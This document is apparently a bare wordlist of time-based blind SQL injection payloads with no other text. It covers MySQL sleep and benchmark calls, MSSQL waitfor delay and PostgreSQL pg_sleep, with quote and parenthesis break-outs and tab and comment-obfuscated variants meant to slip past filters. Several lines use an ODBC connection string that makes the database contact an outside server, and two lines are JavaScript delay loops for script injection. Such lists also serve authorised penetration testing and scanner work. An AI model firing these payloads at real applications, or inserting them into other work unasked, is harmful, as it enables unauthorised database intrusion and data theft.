sleep(05)#
1 or sleep(05)#
" or sleep(05)#
' or sleep(05)#
" or sleep(05)="
' or sleep(05)='
1) or sleep(05)#
") or sleep(05)="
') or sleep(05)='
1)) or sleep(05)#
")) or sleep(05)="
')) or sleep(05)='
1 and sleep(05)#
" and sleep(05)#
' and sleep(05)#
" and sleep(05)="
' and sleep(05)='
1) and sleep(05)#
") and sleep(05)="
') and sleep(05)='
1)) and sleep(05)#
")) and sleep(05)="
')) and sleep(05)='
;waitfor delay '0:0:05'-- 
);waitfor delay '0:0:05'-- 
';waitfor delay '0:0:05'-- 
";waitfor delay '0:0:05'-- 
');waitfor delay '0:0:05'-- 
");waitfor delay '0:0:05'-- 
));waitfor delay '0:0:05'-- 
'));waitfor delay '0:0:05'-- 
"));waitfor delay '0:0:05'-- 
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(05)-- 
1 or pg_sleep(05)-- 
" or pg_sleep(05)-- 
' or pg_sleep(05)-- 
1) or pg_sleep(05)-- 
") or pg_sleep(05)-- 
') or pg_sleep(05)-- 
1)) or pg_sleep(05)-- 
")) or pg_sleep(05)-- 
')) or pg_sleep(05)-- 
1 and pg_sleep(05)-- 
" and pg_sleep(05)-- 
' and pg_sleep(05)-- 
1) and pg_sleep(05)-- 
") and pg_sleep(05)-- 
') and pg_sleep(05)-- 
1)) and pg_sleep(05)-- 
")) and pg_sleep(05)-- 
')) and pg_sleep(05)-- 
1\tor\tsleep(05)#
"\tor\tsleep(05)#
'\tor\tsleep(05)#
"\tor\tsleep(05)="
'\tor\tsleep(05)='
1)\tor\tsleep(05)#
")\tor\tsleep(05)="
')\tor\tsleep(05)='
1))\tor\tsleep(05)#
"))\tor\tsleep(05)="
'))\tor\tsleep(05)='
1\tand\tsleep(05)#
"\tand\tsleep(05)#
'\tand\tsleep(05)#
"\tand\tsleep(05)="
'\tand\tsleep(05)='
1)\tand\tsleep(05)#
")\tand\tsleep(05)="
')\tand\tsleep(05)='
1))\tand\tsleep(05)#
"))\tand\tsleep(05)="
'))\tand\tsleep(05)='
;waitfor\tdelay\t'0:0:05'-- 
);waitfor\tdelay\t'0:0:05'-- 
';waitfor\tdelay\t'0:0:05'-- 
";waitfor\tdelay\t'0:0:05'-- 
');waitfor\tdelay\t'0:0:05'-- 
");waitfor\tdelay\t'0:0:05'-- 
));waitfor\tdelay\t'0:0:05'-- 
'));waitfor\tdelay\t'0:0:05'-- 
"));waitfor\tdelay\t'0:0:05'-- 
1\tor\tbenchmark(10000000,MD5(1))#
"\tor\tbenchmark(10000000,MD5(1))#
'\tor\tbenchmark(10000000,MD5(1))#
1)\tor\tbenchmark(10000000,MD5(1))#
")\tor\tbenchmark(10000000,MD5(1))#
')\tor\tbenchmark(10000000,MD5(1))#
1))\tor\tbenchmark(10000000,MD5(1))#
"))\tor\tbenchmark(10000000,MD5(1))#
'))\tor\tbenchmark(10000000,MD5(1))#
1\tor\tpg_sleep(05)-- 
"\tor\tpg_sleep(05)-- 
'\tor\tpg_sleep(05)-- 
1)\tor\tpg_sleep(05)-- 
")\tor\tpg_sleep(05)-- 
')\tor\tpg_sleep(05)-- 
1))\tor\tpg_sleep(05)-- 
"))\tor\tpg_sleep(05)-- 
'))\tor\tpg_sleep(05)-- 
1\tand\tpg_sleep(05)-- 
"\tand\tpg_sleep(05)-- 
'\tand\tpg_sleep(05)-- 
1)\tand\tpg_sleep(05)-- 
")\tand\tpg_sleep(05)-- 
')\tand\tpg_sleep(05)-- 
1))\tand\tpg_sleep(05)-- 
"))\tand\tpg_sleep(05)-- 
'))\tand\tpg_sleep(05)-- 
1/**/or/**/sleep(05)#
"/**/or/**/sleep(05)#
'/**/or/**/sleep(05)#
"/**/or/**/sleep(05)="
'/**/or/**/sleep(05)='
1)/**/or/**/sleep(05)#
")/**/or/**/sleep(05)="
')/**/or/**/sleep(05)='
1))/**/or/**/sleep(05)#
"))/**/or/**/sleep(05)="
'))/**/or/**/sleep(05)='
1/**/and/**/sleep(05)#
"/**/and/**/sleep(05)#
'/**/and/**/sleep(05)#
"/**/and/**/sleep(05)="
'/**/and/**/sleep(05)='
1)/**/and/**/sleep(05)#
")/**/and/**/sleep(05)="
')/**/and/**/sleep(05)='
1))/**/and/**/sleep(05)#
"))/**/and/**/sleep(05)="
'))/**/and/**/sleep(05)='
;waitfor/**/delay/**/'0:0:05'-- 
);waitfor/**/delay/**/'0:0:05'-- 
';waitfor/**/delay/**/'0:0:05'-- 
";waitfor/**/delay/**/'0:0:05'-- 
');waitfor/**/delay/**/'0:0:05'-- 
");waitfor/**/delay/**/'0:0:05'-- 
));waitfor/**/delay/**/'0:0:05'-- 
'));waitfor/**/delay/**/'0:0:05'-- 
"));waitfor/**/delay/**/'0:0:05'-- 
1/**/or/**/benchmark(10000000,MD5(1))#
"/**/or/**/benchmark(10000000,MD5(1))#
'/**/or/**/benchmark(10000000,MD5(1))#
1)/**/or/**/benchmark(10000000,MD5(1))#
")/**/or/**/benchmark(10000000,MD5(1))#
')/**/or/**/benchmark(10000000,MD5(1))#
1))/**/or/**/benchmark(10000000,MD5(1))#
"))/**/or/**/benchmark(10000000,MD5(1))#
'))/**/or/**/benchmark(10000000,MD5(1))#
1/**/or/**/pg_sleep(05)-- 
"/**/or/**/pg_sleep(05)-- 
'/**/or/**/pg_sleep(05)-- 
1)/**/or/**/pg_sleep(05)-- 
")/**/or/**/pg_sleep(05)-- 
')/**/or/**/pg_sleep(05)-- 
1))/**/or/**/pg_sleep(05)-- 
"))/**/or/**/pg_sleep(05)-- 
'))/**/or/**/pg_sleep(05)-- 
1/**/and/**/pg_sleep(05)-- 
"/**/and/**/pg_sleep(05)-- 
'/**/and/**/pg_sleep(05)-- 
1)/**/and/**/pg_sleep(05)-- 
")/**/and/**/pg_sleep(05)-- 
')/**/and/**/pg_sleep(05)-- 
1))/**/and/**/pg_sleep(05)-- 
"))/**/and/**/pg_sleep(05)-- 
'))/**/and/**/pg_sleep(05)-- 
' and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
" and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
') and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
") and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
')) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
")) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0
';d=new Date();do{cd=new Date();}while(cd-d<10000);//
";d=new Date();do{cd=new Date();}while(cd-d<10000);//